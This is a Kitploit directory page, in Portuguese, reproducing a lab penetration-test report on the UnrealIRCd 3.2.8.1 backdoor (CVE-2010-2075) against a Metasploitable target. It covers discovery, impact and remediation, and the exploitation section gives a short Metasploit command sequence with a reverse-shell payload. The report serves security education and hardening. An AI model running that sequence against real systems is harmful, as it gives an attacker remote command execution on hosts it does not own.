Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
unrealircd-backdoor-pentest-report — Relatório de laboratório de PenTest controlado para backdoor do UnrealIRCd 3.2.8.1 (CVE-2010-2075) no Metasploitable3 com etapas de remediação. | Kitploit
Ferramentas/GitHubGitHub/elazab2005/unrealircd-backdoor-pentest-report
ReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed TeamingLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
elazab2005/unrealircd-backdoor-pentest-report

unrealircd-backdoor-pentest-report

Relatório de laboratório de PenTest controlado para backdoor do UnrealIRCd 3.2.8.1 (CVE-2010-2075) no Metasploitable3 com etapas de remediação.

Ver Repositório
há 4 diasAinda não revisado
Compartilhar

🛡️ Teste de Penetração do Backdoor do UnrealIRCd

Um projeto controlado de teste de penetração focado em identificar, explorar e corrigir o backdoor do UnrealIRCd 3.2.8.1 (CVE-2010-2075) em um ambiente de treinamento isolado.

Aviso: Este projeto foi conduzido estritamente para fins educacionais e de testes de segurança autorizados contra um ambiente de laboratório deliberadamente vulnerável. Nenhum sistema não autorizado foi alvo.


📌 Visão Geral do Projeto

Este projeto demonstra um fluxo de trabalho completo de avaliação de vulnerabilidades e exploração contra um serviço UnrealIRCd 3.2.8.1 vulnerável.

A avaliação abrange:

  • Descoberta e enumeração de serviços
  • Identificação de um serviço UnrealIRCd vulnerável
  • Validação do serviço IRC exposto
  • Exploração controlada usando Metasploit
  • Coleta de evidências
  • Remediação e endurecimento de segurança
  • Documentação técnica do teste de penetração

Alvo

ItemDetalhes
AlvoAmbiente de Laboratório Metasploitable
IP do Alvo10.10.10.13
Serviço VulnerávelUnrealIRCd
Versão3.2.8.1
ProtocoloIRC
Porta6667/TCP
VulnerabilidadeBackdoor do UnrealIRCd
CVECVE-2010-2075
SeveridadeCrítica

De acordo com o Banco de Dados Nacional de Vulnerabilidades do NIST, as distribuições afetadas do UnrealIRCd 3.2.8.1 continham uma modificação introduzida externamente que poderia permitir que atacantes remotos executassem comandos arbitrários.


🎯 Objetivos

Os principais objetivos desta avaliação foram:

  1. Identificar serviços expostos no alvo.
  2. Determinar se o serviço UnrealIRCd estava vulnerável.
  3. Validar a vulnerabilidade por meio de exploração controlada.
  4. Avaliar o impacto potencial de uma exploração bem-sucedida.
  5. Documentar as evidências técnicas.
  6. Aplicar as medidas de remediação adequadas.
  7. Verificar se o serviço vulnerável foi protegido ou desativado.

🧰 Ferramentas Utilizadas

FerramentaFinalidade
NmapVarredura de portas e enumeração de serviços
NetcatTeste de conectividade do serviço TCP
Metasploit FrameworkExploração controlada
Linux CLIVerificação e endurecimento do sistema
UFWConfiguração de firewall
PythonTarefas complementares de segurança/testes

🔎 Metodologia

A avaliação seguiu um fluxo de trabalho simplificado de teste de penetração:

root@kitploit:~
Reconnaissance
      ↓
Service Enumeration
      ↓
Vulnerability Identification
      ↓
Exploitation
      ↓
Evidence Collection
      ↓
Impact Assessment
      ↓
Remediation
      ↓
Verification

1. 🔍 Descoberta de Serviços

A primeira etapa foi identificar os serviços expostos no host alvo.

A avaliação identificou um serviço IRC escutando em:

root@kitploit:~
TCP/6667

O serviço foi associado ao UnrealIRCd 3.2.8.1, uma versão conhecida por ser afetada pela vulnerabilidade de backdoor.

Evidências

Varredura de Portas

Figura 1 — Enumeração de portas e serviços

A descoberta da porta TCP/6667 forneceu a indicação inicial de que um serviço IRC estava exposto e exigia investigação adicional.


2. 🚨 Identificação de Vulnerabilidade

A versão do UnrealIRCd identificada foi associada ao CVE-2010-2075.

A vulnerabilidade não é simplesmente um bug de software convencional. O pacote afetado continha uma modificação/backdoor maliciosa que permitia a execução remota de comandos. O NVD descreve o problema como um Cavalo de Troia introduzido externamente na macro DEBUG3_DOLOG_SYSTEM.

A documentação do Metasploit da Rapid7 identifica o módulo correspondente como:

root@kitploit:~
exploit/unix/irc/unreal_ircd_3281_backdoor

e o descreve como a exploração do backdoor malicioso presente nos arquivos afetados do UnrealIRCd 3.2.8.1.


3. 💥 Exploração Controlada

A vulnerabilidade foi validada no ambiente de laboratório isolado usando o Metasploit Framework.

Exemplo de fluxo de exploração:

root@kitploit:~
msfconsole

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 10.10.10.13

set PAYLOAD cmd/unix/reverse

run

O objetivo desta etapa foi verificar se o serviço exposto poderia ser abusado para obter execução remota de comandos.

A Rapid7 documenta este módulo do Metasploit especificamente para o backdoor do UnrealIRCd 3.2.8.1.

Evidências

Evidência de Exploração

Figura 2 — Evidência da exploração controlada

As evidências demonstram o estágio de exploração realizado contra o alvo de laboratório autorizado.


4. ⚠️ Impacto de Segurança

A exploração bem-sucedida do backdoor pode fornecer a um atacante a capacidade de executar comandos remotamente no contexto de segurança do processo do UnrealIRCd afetado.

Os privilégios exatos obtidos dependem da conta sob a qual o daemon IRC está sendo executado.

O impacto potencial inclui:

  • Execução não autorizada de comandos
  • Comprometimento inicial do sistema
  • Acesso a arquivos disponíveis para a conta comprometida
  • Enumeração local adicional
  • Possível escalonamento de privilégios
  • Possível persistência
  • Possível movimento lateral se existirem outras fraquezas

Importante: O impacto potencial não deve ser interpretado como evidência de que todas as ações listadas foram realizadas durante esta avaliação.

A documentação do Nmap para o backdoor do UnrealIRCd confirma que a vulnerabilidade pode ser usada para executar comandos arbitrários no sistema remoto.


5. 🛠️ Remediação

A instalação vulnerável do UnrealIRCd não deve permanecer exposta em um ambiente de produção.

As ações de remediação recomendadas incluem:

Ações Imediatas

  1. Remover o pacote UnrealIRCd comprometido/com backdoor.
  2. Substituí-lo por uma versão confiável e verificada de uma fonte legítima.
  3. Desativar o serviço IRC se não for necessário.
  4. Restringir o acesso aos serviços IRC usando regras de firewall ou ACLs de rede.
  5. Revisar o sistema em busca de indicadores de comprometimento.
  6. Revisar logs de autenticação e do sistema.
  7. Rotacionar credenciais potencialmente expostas se houver suspeita de comprometimento.

Endurecimento de Rede

Se o IRC não for necessário:

root@kitploit:~
sudo ufw deny 6667/tcp

Se o serviço for necessário, o acesso deve ser restrito a redes confiáveis em vez de ser amplamente exposto.

Endurecimento do Serviço

A abordagem preferida é remover o software vulnerável e implantar uma versão suportada e confiável, em vez de tentar depender apenas da filtragem de rede.


6. ✅ Evidências de Remediação

O estágio de remediação foi documentado após a aplicação dos controles de segurança apropriados.

Evidência de Remediação

Figura 3 — Evidência de remediação / endurecimento

As evidências de remediação devem demonstrar o estado do serviço e/ou da configuração do firewall após a aplicação das ações corretivas.


📊 Avaliação de Riscos

CategoriaAvaliação
VulnerabilidadeBackdoor do UnrealIRCd 3.2.8.1
CVECVE-2010-2075
Vetor de AtaqueRede
Autenticação NecessáriaNenhuma autenticação necessária para acionar o backdoor
Interação do UsuárioNão necessária
ImpactoExecução remota de comandos
SeveridadeCrítica

O backdoor foi projetado para permitir a execução remota de comandos e poderia operar independentemente das restrições normais de usuários do IRC, tornando a exposição do serviço vulnerável um risco de segurança significativo.


📁 Estrutura do Projeto

root@kitploit:~
unrealircd-backdoor-pentest-report/
│
├── README.md
├── UnrealIRCD_Backdoor_PenTest_Report.pdf
│
└── images/
    ├── port_scan.png
    ├── exploit_evidence.png
    └── remediation.png

📸 Resumo das Evidências

EvidênciaDescrição
port_scan.pngDescoberta do serviço IRC exposto
exploit_evidence.pngEvidência da exploração controlada
remediation.pngEvidência de segurança/endurecimento pós-remediação

🧠 Principais Lições Aprendidas

Esta avaliação demonstra vários conceitos importantes de teste de penetração:

  • A enumeração de serviços é essencial para identificar a superfície de ataque.
  • A identificação da versão do software pode revelar vulnerabilidades conhecidas.
  • Um serviço legado exposto na rede pode fornecer um caminho direto de acesso inicial.
  • A exploração deve ser sempre realizada dentro de um escopo autorizado.
  • As evidências técnicas são essenciais para apoiar as descobertas do teste de penetração.
  • A remediação deve abordar o problema de segurança subjacente em vez de apenas ocultar o serviço exposto.
  • Os relatórios de segurança devem distinguir claramente os resultados observados do impacto potencial.

📚 Referências

  • Banco de Dados Nacional de Vulnerabilidades do NIST — CVE-2010-2075
    Detalhes do CVE e descrição da vulnerabilidade.

  • Banco de Dados de Vulnerabilidades da Rapid7 — Execução de Comandos do Backdoor do UnrealIRCd 3.2.8.1
    Documentação do módulo do Metasploit e detalhes técnicos.

  • Rapid7 Metasploit Framework — Módulo do Backdoor do UnrealIRCd
    Implementação oficial do módulo no Metasploit.

  • Documentação do Nmap NSE — irc-unrealircd-backdoor
    Documentação para detecção do backdoor do UnrealIRCd.


⚖️ Aviso Legal

Este repositório é destinado exclusivamente à educação em cibersegurança, a testes de penetração autorizados e à pesquisa de segurança em ambientes controlados.

As técnicas demonstradas neste projeto devem ser usadas somente contra sistemas para os quais foi obtida autorização explícita.

Não use estas técnicas contra sistemas que você não possui ou para os quais não tem permissão para testar.

Baixar ferramenta